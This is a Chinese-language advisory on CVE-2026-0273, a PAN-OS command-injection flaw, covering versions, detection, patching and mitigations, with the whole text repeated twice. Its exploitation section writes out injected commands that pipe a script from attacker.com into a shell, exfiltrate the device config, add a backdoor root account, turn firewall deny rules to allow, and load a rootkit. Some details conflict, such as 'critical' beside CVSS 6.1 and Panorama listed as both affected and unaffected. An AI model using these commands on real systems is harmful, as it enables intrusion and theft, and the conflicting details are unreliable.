Palo Alto Networks 的 PAN-OS 防火墙是全球部署最广泛的企业安全设备之一为处理数十亿美元金融交易、关键基础设施运营和机密政府工作的网络提供保护。2026 年 6 月 11 日Palo Alto 披露了 CVE-2026-0273——一个严重的命令注入漏洞允许已认证的管理员在 PA 系列、VM 系列和 Panorama 设备上以 root 用户身份执行任意命令。该漏洞只需有效的管理员凭据无需任何特殊配置因此任何攻击者只要攻破或冒充管理帐户即可立即获得权限提升。本指南将详细介绍该漏洞的具体内容、受影响的版本、攻击者如何利用该漏洞、哪些指标可以显示正在被利用以及如何验证您的设备是否已安装补丁。要点总结☉CVE-2026-0273 是 PAN-OS 中的一个严重命令注入漏洞 (CVSS 6.1)它允许经过身份验证的管理员以 root 身份执行任意操作系统命令从而将任何管理帐户的泄露转化为整个系统的泄露。☉受影响的版本PA 系列、VM 系列和 Panorama 设备上的 PAN-OS 12.1、11.2、11.1 和 10.2 — Cloud NGFW 和 Prisma Access 不受影响。☉该漏洞可通过 CLI 或 Web 管理界面利用——无需特殊配置任何经过身份验证的管理员访问权限都足以进行利用。☉同一安全公告中的相关漏洞CVE-2026-0272CLI 权限提升和 CVE-2026-0269基于隧道的 DoS 攻击 ——组织必须修补所有这三个漏洞才能彻底消除风险。☉截至 2026 年 6 月Palo Alto 报告称没有在野外进行恶意利用但该漏洞的严重性和易利用性使其成为威胁行为者的首要目标。☉可以通过审计日志进行检测但这需要启用详细的 PAN-OS 日志记录和监控 CLI 命令以发现可疑活动——大多数组织对于此漏洞的日志记录不足。☉缓解步骤识别受影响的设备 → 应用补丁 → 验证补丁安装 → 监控利用指标 → 验证访问控制。什么是 CVE-2026-0273CVE-2026-0273 是 PAN-OS 管理界面中的一个命令注入漏洞它允许已认证的管理员绕过输入验证并以 root 权限执行任意操作系统命令。该漏洞源于管理 Web 界面和 CLI 命令中对用户输入的处理不当。拥有有效 PAN-OS 管理员凭据的已认证攻击者可以注入特制命令这些命令由底层 Linux 操作系统以 root 权限执行从而使攻击者完全控制防火墙设备包括☉访问所有防火墙配置和密钥☉能够修改防火墙规则和策略☉网络流量日志和会话数据泄露☉安装持久性后门☉从防火墙本身横向移动到受保护的网络中核心问题是用户输入在传递给系统 shell 命令之前没有经过适当的清理从而允许通过特殊字符或转义序列进行命令注入。攻击要求身份验证攻击者必须拥有有效的 PAN-OS 管理员凭据无需特殊角色标准管理员访问权限即可。网络访问攻击者必须拥有对 PAN-OS 管理界面的网络访问权限Web UI 端口 443 或 CLI 端口 22/SSH。无需特殊配置该设备“开箱即用”——无需任何非默认设置即可启用漏洞利用。这意味着以下任何一种妥协都可能导致攻击☉被盗或权限不足的管理员凭据☉针对防火墙管理员的网络钓鱼☉内部威胁拥有管理员权限☉如果防火墙对 AD 进行身份验证则 LDAP/Active Directory 凭据可能泄露。☉供应链漏洞导致管理员账户被植入后门。☉绕过身份验证控制参见 CVE-2025-0108该漏洞已被单独积极利用受影响的版本和产品CVE-2026-0273 影响 PA 系列和 VM 系列防火墙以及运行特定 PAN-OS 12.1、11.2、11.1 和 10.2 版本的 Panorama 设备。受影响的PAN-OS版本☉12.1.x12.1.4 及之前的所有版本☉11.2.x11.2.3 及之前的所有版本☉11.1.x11.1.2 及之前的所有版本☉10.2.x10.2.7 及之前的所有版本受影响的型号☉PA系列防火墙所有型号PA-400、PA-800、PA-3200、PA-5200、PA-7000系列等☉VM系列防火墙AWS、Azure、GCP、VMware、KVM上的虚拟设备☉Panorama集中管理设备未受影响☉云端下一代防火墙Palo Alto Networks 的云原生产品☉Prisma Access基于云的安全访问平台☉旧版本9.1 及更早版本未提及受影响——请直接联系 Palo Alto 确认是否需要扩展支持版本CVE-2026-0273 的利用方式对于拥有有效管理员凭据的攻击者来说利用该漏洞的过程非常简单。Web UI漏洞利用经过身份验证的攻击者可以通过访问 PAN-OS Web 管理界面 (https://firewall-ip) 进入 CLI 部分并注入命令使用有效的管理员凭据登录导航至“设备”→“操作”→“检索命令输出”注入命令; cat /etc/passwd # 或 ; whoami ; id #防火墙以 root 用户身份执行注入的命令并返回输出CLI漏洞利用攻击者可以通过 SSH 或 Telnet 连接到管理界面直接执行命令bashssh adminfirewall-ip help ; whoami # 注入的命令以 root 用户身份执行 ; cat /etc/shadow # ; curl http://attacker.com/backdoor.sh | sh #后渗透访问一旦命令执行成功攻击者可以创建持久后门帐户bash; useradd -m -p $(openssl passwd -1 backdoor) backdoor-admin ; usermod -aG sudo backdoor-admin #提取敏感数据bash; cat /opt/pancfg/etc/device_db | base64 | curl -d - http://attacker.com/exfil #修改防火墙规则以禁用安全功能bash; sed -i s/.*deny.*/allow/g /opt/palo/etc/rules.xml #安装内核级 rootkitbash; insmod /root/rootkit.ko ; rootkit.sh #向受保护的网络过渡防火墙现在充当横向移动的可信内部网关。同一公告中的相关漏洞Palo Alto 同时披露了三个漏洞必须修补所有这三个漏洞才能彻底解决问题。CVE-2026-0272CLI权限提升CVE-2026-0272 是 PAN-OS CLI 中的一个中等严重级别的权限提升漏洞它允许经过身份验证的管理员以 root 权限在设备上执行操作。严重性中等CVSS ~6.5影响低权限管理员帐户的权限提升 缓解措施与 CVE-2026-0273 相同的补丁CVE-2026-0269隧道流量拒绝服务CVE-2026-0269 是隧道流量处理中的一个内存损坏漏洞允许已认证用户通过发送精心构造的数据包反复重启防火墙。配置了 IPsec 隧道或 GlobalProtect 网关的设备会受到此漏洞的影响反复利用此漏洞可使防火墙进入维护模式从而影响其可用性。严重性中等CVSS 评分约为 6.0 影响通过反复重启导致拒绝服务 缓解措施与 CVE-2026-0273 相同的补丁识别环境中受影响的设备使用 ReconShield 的SSL/TLS 检查器结合手动版本验证识别网络中的所有 Palo Alto 防火墙。步骤 1网络资产发现找出所有 Palo Alto 管理接口☉端口 443HTTPS Web 用户界面☉端口 22SSH 命令行界面☉设备通常会对 HTTPS 请求做出“Palo Alto Networks”的响应。使用 ReconShield 的端口扫描器识别已知防火墙 IP 地址范围内的 443 端口bashnmap -p443 --script ssl-cert 10.0.0.0/8步骤 2确定 PAN-OS 版本访问网页界面并查看设备 → 关于 → 版本 或通过 API 查询banshcurl -k https://firewall-ip/api/?typeopcmdshowsysteminfo/info/system/showkeyYOUR_API_KEY步骤 3与漏洞列表进行交叉引用检查版本是否在受影响的范围内12.1.x、11.2.x、11.1.x、10.2.x步骤 4确定型号类型在“关于”页面中确定它是否属于以下情况☉PA系列物理防火墙☉VM系列虚拟机☉Panorama管理设备Cloud NGFW 和 Prisma Access 不受影响。漏洞利用的检测与监控可以检测到但需要正确的日志配置。审计日志指标在PAN-OS管理界面上启用详细审计设备 → 日志 → 日志设置 → 管理界面日志监控审计日志查看以下内容☉包含特殊字符;、|、、$(...)、反引号的非常规 CLI 命令☉以 root 用户身份执行的命令而正常操作应该以用户级别执行。☉多次管理员登录失败后最终成功验证☉访问敏感目录/etc、/opt、/root基于网络的检测监控管理接口流量☉向非常规端点发送 POST 请求☉包含命令注入有效载荷;、|、$()的 HTTP 请求☉管理端口发生大量数据外泄☉通过 SSH 连接到管理界面然后进行批量数据传输防火墙特定指标监控 PAN-OS 的以下方面☉configd 或 CLI 进程意外地生成了进程☉通过管理界面创建新用户帐户☉非授权管理员发起的防火墙规则更改☉防火墙设备本身存在意外的出站连接修复和修补对于拥有多台设备的组织而言补丁的发布时间和版本至关重要。补丁可用性状态截至 2026 年 6 月Palo Alto Networks 已发布修复版本☉12.1.5已修复 CVE-2026-0273、CVE-2026-0272、CVE-2026-0269 漏洞☉11.2.4已修复☉11.1.3已修复☉10.2.8已打补丁修补策略第一阶段立即24小时内☉仅允许受信任的 IP 地址访问管理接口☉实施网络分段隔离管理访问权限☉如果可用请启用管理接口访问的多因素身份验证 (MFA)☉检查管理员帐户访问日志是否存在异常第二阶段短期1周内☉在实验室/非生产环境中测试已打补丁的版本☉验证补丁是否会破坏现有配置☉安排生产补丁的维护窗口第三阶段生产环境修补协调所有受影响的设备☉按重要性顺序优先修复关键基础设施进行补丁修复☉每个补丁都需要重启防火墙。☉确保故障转移/高可用性组件对按顺序进行修补。☉监控补丁更新后出现的问题。修补中央管理平台Panorama如果使用 Panorama 集中管理首先修补 Panorama 设备无需中断受管防火墙即可完成。通过 Panorama 将已打补丁的 PAN-OS 版本推送至受管防火墙。临时解决方案和缓解措施直至补丁发布这些都是临时措施只有打补丁才能彻底解决问题。限制管理接口访问设备 → 设置 → 管理 → IP 主机名/证书 → 管理接口设置 → IP 协议 → 限制对特定源 IP 的访问禁用大多数管理员的 CLI 访问权限设备 → 管理员角色 → [角色] → 编辑 → 取消勾选“CLI 权限”启用命令审计设备 → 日志 → 日志设置 → 启用管理日志 → 配置可疑命令警报实施网络级访问控制☉使用堡垒主机/跳板机进行所有防火墙管理☉限制防火墙管理接口直接访问互联网☉需要 VPN 访问权限才能访问管理网络CVE-2026-0273 是一个影响全球数百万台 Palo Alto 防火墙的严重漏洞。该漏洞利用简便只需有效的管理员凭据无需特殊配置且危害极大可执行 root 权限命令因此必须立即进行修复。组织必须识别所有受影响的PAN-OS设备立即限制管理接口访问计划并执行补丁程序验证补丁安装监测漏洞利用指标该漏洞凸显了对安全基础设施进行外部暴露评估的重要性。防火墙和其他安全设备绝不应直接暴露于互联网它们的管理接口应仅限于受信任的内部网络。使用的端口扫描器和SSL/TLS 检查器来审核您的外部暴露情况并识别任何需要立即修复的面向互联网的管理接口。
网络研究观-严重漏洞允许以 root 用户身份执行任意命令:CVE-2026-0273 分析
Palo Alto Networks 的 PAN-OS 防火墙是全球部署最广泛的企业安全设备之一为处理数十亿美元金融交易、关键基础设施运营和机密政府工作的网络提供保护。2026 年 6 月 11 日Palo Alto 披露了 CVE-2026-0273——一个严重的命令注入漏洞允许已认证的管理员在 PA 系列、VM 系列和 Panorama 设备上以 root 用户身份执行任意命令。该漏洞只需有效的管理员凭据无需任何特殊配置因此任何攻击者只要攻破或冒充管理帐户即可立即获得权限提升。本指南将详细介绍该漏洞的具体内容、受影响的版本、攻击者如何利用该漏洞、哪些指标可以显示正在被利用以及如何验证您的设备是否已安装补丁。要点总结☉CVE-2026-0273 是 PAN-OS 中的一个严重命令注入漏洞 (CVSS 6.1)它允许经过身份验证的管理员以 root 身份执行任意操作系统命令从而将任何管理帐户的泄露转化为整个系统的泄露。☉受影响的版本PA 系列、VM 系列和 Panorama 设备上的 PAN-OS 12.1、11.2、11.1 和 10.2 — Cloud NGFW 和 Prisma Access 不受影响。☉该漏洞可通过 CLI 或 Web 管理界面利用——无需特殊配置任何经过身份验证的管理员访问权限都足以进行利用。☉同一安全公告中的相关漏洞CVE-2026-0272CLI 权限提升和 CVE-2026-0269基于隧道的 DoS 攻击 ——组织必须修补所有这三个漏洞才能彻底消除风险。☉截至 2026 年 6 月Palo Alto 报告称没有在野外进行恶意利用但该漏洞的严重性和易利用性使其成为威胁行为者的首要目标。☉可以通过审计日志进行检测但这需要启用详细的 PAN-OS 日志记录和监控 CLI 命令以发现可疑活动——大多数组织对于此漏洞的日志记录不足。☉缓解步骤识别受影响的设备 → 应用补丁 → 验证补丁安装 → 监控利用指标 → 验证访问控制。什么是 CVE-2026-0273CVE-2026-0273 是 PAN-OS 管理界面中的一个命令注入漏洞它允许已认证的管理员绕过输入验证并以 root 权限执行任意操作系统命令。该漏洞源于管理 Web 界面和 CLI 命令中对用户输入的处理不当。拥有有效 PAN-OS 管理员凭据的已认证攻击者可以注入特制命令这些命令由底层 Linux 操作系统以 root 权限执行从而使攻击者完全控制防火墙设备包括☉访问所有防火墙配置和密钥☉能够修改防火墙规则和策略☉网络流量日志和会话数据泄露☉安装持久性后门☉从防火墙本身横向移动到受保护的网络中核心问题是用户输入在传递给系统 shell 命令之前没有经过适当的清理从而允许通过特殊字符或转义序列进行命令注入。攻击要求身份验证攻击者必须拥有有效的 PAN-OS 管理员凭据无需特殊角色标准管理员访问权限即可。网络访问攻击者必须拥有对 PAN-OS 管理界面的网络访问权限Web UI 端口 443 或 CLI 端口 22/SSH。无需特殊配置该设备“开箱即用”——无需任何非默认设置即可启用漏洞利用。这意味着以下任何一种妥协都可能导致攻击☉被盗或权限不足的管理员凭据☉针对防火墙管理员的网络钓鱼☉内部威胁拥有管理员权限☉如果防火墙对 AD 进行身份验证则 LDAP/Active Directory 凭据可能泄露。☉供应链漏洞导致管理员账户被植入后门。☉绕过身份验证控制参见 CVE-2025-0108该漏洞已被单独积极利用受影响的版本和产品CVE-2026-0273 影响 PA 系列和 VM 系列防火墙以及运行特定 PAN-OS 12.1、11.2、11.1 和 10.2 版本的 Panorama 设备。受影响的PAN-OS版本☉12.1.x12.1.4 及之前的所有版本☉11.2.x11.2.3 及之前的所有版本☉11.1.x11.1.2 及之前的所有版本☉10.2.x10.2.7 及之前的所有版本受影响的型号☉PA系列防火墙所有型号PA-400、PA-800、PA-3200、PA-5200、PA-7000系列等☉VM系列防火墙AWS、Azure、GCP、VMware、KVM上的虚拟设备☉Panorama集中管理设备未受影响☉云端下一代防火墙Palo Alto Networks 的云原生产品☉Prisma Access基于云的安全访问平台☉旧版本9.1 及更早版本未提及受影响——请直接联系 Palo Alto 确认是否需要扩展支持版本CVE-2026-0273 的利用方式对于拥有有效管理员凭据的攻击者来说利用该漏洞的过程非常简单。Web UI漏洞利用经过身份验证的攻击者可以通过访问 PAN-OS Web 管理界面 (https://firewall-ip) 进入 CLI 部分并注入命令使用有效的管理员凭据登录导航至“设备”→“操作”→“检索命令输出”注入命令; cat /etc/passwd # 或 ; whoami ; id #防火墙以 root 用户身份执行注入的命令并返回输出CLI漏洞利用攻击者可以通过 SSH 或 Telnet 连接到管理界面直接执行命令bashssh adminfirewall-ip help ; whoami # 注入的命令以 root 用户身份执行 ; cat /etc/shadow # ; curl http://attacker.com/backdoor.sh | sh #后渗透访问一旦命令执行成功攻击者可以创建持久后门帐户bash; useradd -m -p $(openssl passwd -1 backdoor) backdoor-admin ; usermod -aG sudo backdoor-admin #提取敏感数据bash; cat /opt/pancfg/etc/device_db | base64 | curl -d - http://attacker.com/exfil #修改防火墙规则以禁用安全功能bash; sed -i s/.*deny.*/allow/g /opt/palo/etc/rules.xml #安装内核级 rootkitbash; insmod /root/rootkit.ko ; rootkit.sh #向受保护的网络过渡防火墙现在充当横向移动的可信内部网关。同一公告中的相关漏洞Palo Alto 同时披露了三个漏洞必须修补所有这三个漏洞才能彻底解决问题。CVE-2026-0272CLI权限提升CVE-2026-0272 是 PAN-OS CLI 中的一个中等严重级别的权限提升漏洞它允许经过身份验证的管理员以 root 权限在设备上执行操作。严重性中等CVSS ~6.5影响低权限管理员帐户的权限提升 缓解措施与 CVE-2026-0273 相同的补丁CVE-2026-0269隧道流量拒绝服务CVE-2026-0269 是隧道流量处理中的一个内存损坏漏洞允许已认证用户通过发送精心构造的数据包反复重启防火墙。配置了 IPsec 隧道或 GlobalProtect 网关的设备会受到此漏洞的影响反复利用此漏洞可使防火墙进入维护模式从而影响其可用性。严重性中等CVSS 评分约为 6.0 影响通过反复重启导致拒绝服务 缓解措施与 CVE-2026-0273 相同的补丁识别环境中受影响的设备使用 ReconShield 的SSL/TLS 检查器结合手动版本验证识别网络中的所有 Palo Alto 防火墙。步骤 1网络资产发现找出所有 Palo Alto 管理接口☉端口 443HTTPS Web 用户界面☉端口 22SSH 命令行界面☉设备通常会对 HTTPS 请求做出“Palo Alto Networks”的响应。使用 ReconShield 的端口扫描器识别已知防火墙 IP 地址范围内的 443 端口bashnmap -p443 --script ssl-cert 10.0.0.0/8步骤 2确定 PAN-OS 版本访问网页界面并查看设备 → 关于 → 版本 或通过 API 查询banshcurl -k https://firewall-ip/api/?typeopcmdshowsysteminfo/info/system/showkeyYOUR_API_KEY步骤 3与漏洞列表进行交叉引用检查版本是否在受影响的范围内12.1.x、11.2.x、11.1.x、10.2.x步骤 4确定型号类型在“关于”页面中确定它是否属于以下情况☉PA系列物理防火墙☉VM系列虚拟机☉Panorama管理设备Cloud NGFW 和 Prisma Access 不受影响。漏洞利用的检测与监控可以检测到但需要正确的日志配置。审计日志指标在PAN-OS管理界面上启用详细审计设备 → 日志 → 日志设置 → 管理界面日志监控审计日志查看以下内容☉包含特殊字符;、|、、$(...)、反引号的非常规 CLI 命令☉以 root 用户身份执行的命令而正常操作应该以用户级别执行。☉多次管理员登录失败后最终成功验证☉访问敏感目录/etc、/opt、/root基于网络的检测监控管理接口流量☉向非常规端点发送 POST 请求☉包含命令注入有效载荷;、|、$()的 HTTP 请求☉管理端口发生大量数据外泄☉通过 SSH 连接到管理界面然后进行批量数据传输防火墙特定指标监控 PAN-OS 的以下方面☉configd 或 CLI 进程意外地生成了进程☉通过管理界面创建新用户帐户☉非授权管理员发起的防火墙规则更改☉防火墙设备本身存在意外的出站连接修复和修补对于拥有多台设备的组织而言补丁的发布时间和版本至关重要。补丁可用性状态截至 2026 年 6 月Palo Alto Networks 已发布修复版本☉12.1.5已修复 CVE-2026-0273、CVE-2026-0272、CVE-2026-0269 漏洞☉11.2.4已修复☉11.1.3已修复☉10.2.8已打补丁修补策略第一阶段立即24小时内☉仅允许受信任的 IP 地址访问管理接口☉实施网络分段隔离管理访问权限☉如果可用请启用管理接口访问的多因素身份验证 (MFA)☉检查管理员帐户访问日志是否存在异常第二阶段短期1周内☉在实验室/非生产环境中测试已打补丁的版本☉验证补丁是否会破坏现有配置☉安排生产补丁的维护窗口第三阶段生产环境修补协调所有受影响的设备☉按重要性顺序优先修复关键基础设施进行补丁修复☉每个补丁都需要重启防火墙。☉确保故障转移/高可用性组件对按顺序进行修补。☉监控补丁更新后出现的问题。修补中央管理平台Panorama如果使用 Panorama 集中管理首先修补 Panorama 设备无需中断受管防火墙即可完成。通过 Panorama 将已打补丁的 PAN-OS 版本推送至受管防火墙。临时解决方案和缓解措施直至补丁发布这些都是临时措施只有打补丁才能彻底解决问题。限制管理接口访问设备 → 设置 → 管理 → IP 主机名/证书 → 管理接口设置 → IP 协议 → 限制对特定源 IP 的访问禁用大多数管理员的 CLI 访问权限设备 → 管理员角色 → [角色] → 编辑 → 取消勾选“CLI 权限”启用命令审计设备 → 日志 → 日志设置 → 启用管理日志 → 配置可疑命令警报实施网络级访问控制☉使用堡垒主机/跳板机进行所有防火墙管理☉限制防火墙管理接口直接访问互联网☉需要 VPN 访问权限才能访问管理网络CVE-2026-0273 是一个影响全球数百万台 Palo Alto 防火墙的严重漏洞。该漏洞利用简便只需有效的管理员凭据无需特殊配置且危害极大可执行 root 权限命令因此必须立即进行修复。组织必须识别所有受影响的PAN-OS设备立即限制管理接口访问计划并执行补丁程序验证补丁安装监测漏洞利用指标该漏洞凸显了对安全基础设施进行外部暴露评估的重要性。防火墙和其他安全设备绝不应直接暴露于互联网它们的管理接口应仅限于受信任的内部网络。使用的端口扫描器和SSL/TLS 检查器来审核您的外部暴露情况并识别任何需要立即修复的面向互联网的管理接口。
